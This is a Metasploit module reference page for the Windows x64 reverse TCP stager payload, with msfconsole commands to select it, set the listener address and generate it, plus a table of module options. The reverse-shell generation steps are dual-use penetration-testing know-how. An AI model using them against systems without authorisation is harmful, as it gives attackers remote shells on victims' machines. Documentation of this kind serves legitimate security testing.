Windows x64 Command Shell, Windows x64 Reverse TCP Stager
Connect back to the attacker (Windows x64), Spawn a piped command shell (Windows x64) (staged)
Rank
- Normal
Authors
- sf < stephen_fewer [at] harmonysecurity.com >
Similar Modules
- payload/windows/x64/shell/bind_tcp
- payload/windows/x64/shell_bind_tcp
- payload/windows/x64/shell_reverse_tcp
Usage Information
$ msfconsole
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use payload/windows/x64/shell/reverse_tcp
msf payload(reverse_tcp) > set LHOST [MY IP ADDRESS]
msf payload(reverse_tcp) > generate
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use payload/windows/x64/shell/reverse_tcp
msf payload(reverse_tcp) > set LHOST [MY IP ADDRESS]
msf payload(reverse_tcp) > generate
Module Options
| EXITFUNC | Exit technique: thread, seh, none, process (default: process) |
| LHOST | The listen address |
| LPORT | The listen port (default: 4444) |
| AutoRunScript | A script to run automatically on session creation. |
| InitialAutoRunScript | An initial script to run on session creation (before AutoRunScript) |
| ReverseConnectRetries | The number of connection attempts to try before exiting the process |
| ReverseListenerBindAddress | The specific IP address to bind to on the local system |
| ReverseListenerComm | The specific communication channel to use for this listener |
| VERBOSE | Enable detailed status messages |
| WORKSPACE | Specify the workspace for this module |